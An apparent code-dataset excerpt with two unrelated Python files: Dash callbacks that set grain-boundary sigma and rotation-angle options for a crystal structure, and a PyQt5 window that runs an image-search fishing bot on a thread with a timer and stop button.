if (rotation_axis is None) or (not structure):
raise PreventUpdate
structure = self.from_data(structure)
sigmas, _, _ = self._get_sigmas_options_and_ratio(
structure=structure, rotation_axis=rotation_axis
)
rotation_angles = sigmas[sigma]
options = []
for rotation_angle in sorted(rotation_angles):
options.append(
{"label": "{:.2f}º".format(rotation_angle), "value": rotation_angle}
)
return options
# TODO: make client-side callback
@app.callback(
[Output(self.id("sigma"), "value"), Output(self.id("sigma"), "disabled")],
[
Input(self.id("sigma"), "options"),
Input(self.id("enable_transformation"), "on"),
],
)
def update_default_value(options, enabled):
if not options:
raise PreventUpdate
return options[0]["value"], enabled
# TODO: make client-side callback, or just combine all callbacks here
@app.callback(
Output(self.id("rotation_angle", is_kwarg=True, hint="literal"), "value"),
[
Input(
self.id("rotation_angle", is_kwarg=True, hint="literal"), "options"
)
],
)
def update_default_value(options):
if not options:
raise PreventUpdate
return options[0]["value"]
| 10,956 | 3,030 |
import imagesearch
import gui
import subprocess
import time
#from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
import traceback,sys
class Thread(QThread):
def __init__(self, fn, f=False):
super(Thread, self).__init__()
signal = pyqtSignal(object)
self.f=f
self.fn=fn
# run method gets called when we start the thread
def run(self):
print("starting thread")
if self.f:
result = self.fn(w).CheckArea()
else:
result = self.fn()
#w.gui.catched_edit.setText(str(process.fish_count))
#w.gui.status_edit.setText(str(process.status))
def stop(self):
print("thread ended")
self.terminate()
class Timer:
def __init__(self,duration):
super(Timer, self).__init__()
self.dur = duration
self.elapsed_s = 0
self.elapsed_m = 0
self.elapsed_h = 0
self.total=0
def timer(self):
while (self.total<=(self.dur*60)) and (w.gui.stoppedLabel.text()==""):
if self.elapsed_m<=59:
if self.elapsed_s<=59:
self.elapsed_s+=1
else:
self.elapsed_s=0
self.elapsed_m+=1
else:
self.elapsed_h+=1
self.elapsed_m=0
time_text=str(self.elapsed_h) + ":" + str(self.elapsed_m) + ":" + str(self.elapsed_s)
w.gui.time_edit.setText(time_text)
self.total+=1
time.sleep(1)
w.gui.stoppedLabel.setText("Stopped")
w.Clear()
class AppWindow(QMainWindow):
def __init__(self):
super(AppWindow, self).__init__()
self.gui = gui.Ui_Window()
self.gui.setupUi(self)
self.fish_thread = Thread(imagesearch.Fishit, f=True)
self.gui.fish_button.clicked.connect(self.FishButton)
#self.fish_thread.signal.connect(self.gui.status_label.setText)
#self.fish_thread.signal.connect(self.finished)
self.gui.stop_button.clicked.connect(self.Stop)
def FishButton(self):
duration = int(self.gui.duration.currentText())
self.gui.fish_button.setEnabled(False)
self.gui.stoppedLabel.setText("")
self.fish_thread.start()
self.timer = Thread(Timer(duration).timer)
self.timer.start()
def Stop(self):
self.gui.stoppedLabel.setText("Stopped")
self.timer.stop()
self.Clear()
self.time=0
def Clear(self):
self.gui.time_edit.setText("0:0:0")
self.gui.catched_edit.setText("")
self.gui.status_edit.setText("")
self.gui.fish_button.setEnabled(True)
if __name__ == "__main__":
app=QApplication(sys.argv)
w=AppWindow()
w.show()
app.exec_() | 2,871 | 950 |